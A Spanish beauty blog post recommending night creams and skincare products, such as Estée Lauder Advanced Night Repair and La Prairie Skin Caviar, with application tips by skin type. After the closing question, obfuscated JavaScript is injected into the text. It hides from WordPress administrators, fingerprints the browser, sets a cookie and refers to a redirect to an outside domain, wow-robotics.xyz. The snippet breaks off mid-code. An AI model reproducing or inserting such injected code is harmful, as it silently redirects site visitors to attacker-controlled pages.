Ya sabemos que la piel es un órgano en constante cambio y evolución, motivo por el que necesita cuidados básicos para que esté en buenas condiciones. Durante el día nos protege de agentes externos como los rayos UV y por la noche comienza la reparación. Por ello, las cremas de día y de noche tienen mayor importancia de la que a veces pensamos, y tienen distinta funcionalidad y usos a la hora de aplicar una u otra.

tratamientosnoche

 

¿Sólo necesitamos cremas para la noche?

Según lo que hemos comentado parece que no harían falta cremas de día, pero sí que son necesarias y complementarias en muchos casos con las de noche. Aunque hoy nos vamos a centrar en éstas últimas, cuya principal misión es la regeneración de la piel. La renovación celular es más rápida mientras dormimos, por lo que la piel estará más receptiva ante cualquier crema o tratamiento que vayamos a utilizar.

 

tratamientonoche

 

¿Qué debes tener en cuenta?

Hay que aplicarse la crema con la piel totalmente limpia y desmaquillada, para que el producto penetre por completo en la piel. Una vez hecho, utiliza una pequeña cantidad y extiéndela suavemente por toda la zona que quieras cubrir con pequeños toques y masajes.

La elección es un tema más complicado, ya que depende de varios factores como la edad o el tipo de piel. Si lo que buscas es una mascarilla-crema formulada para aportar juventud y vitalidad a la piel, Masque Crème à la Rose Noire de Sisley es una opción estupenda. Otro tratamiento antiedad específico para una piel sedosa y luminosa es Extra Intensive de Sensai.

 

tratamientodenoche

 

Por tipo de piel, si la tienes seca, es mejor elegir cremas más densas. Si tienes la piel grasa, es mejor que elijas fluidos o geles más ligeros en crema. Si eliges un producto muy bueno pero que no se adapta a tu piel, quizás pierdes tiempo, dinero y no veas ningún resultado positivo.
Si tu problema es la falta de sueño, opta por una opción reparadora como el Suero Advanced Night Repair de Estée Lauder, que aborda los principales signos visibles de envejecimiento con una exclusiva e innovadora tecnología que maximiza la restauración nocturna de la piel. Otra opción es Midnight Secret de Guerlain, un tratamiento recuperador de noches cortas.

Por último, si quieres un tratamiento muy completo en el cuidado de la piel, elige Skin Caviar de La Prairie, un lujo nocturno para ti ya que cuenta con el poder del cavia para nutrir y rejuvenecer la piel. Se aplica suavemente y se funde con la piel, sometiéndola a una transformación total mientras duermes.

 

Y tú, ¿qué productos utilizas mientras duermes? var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone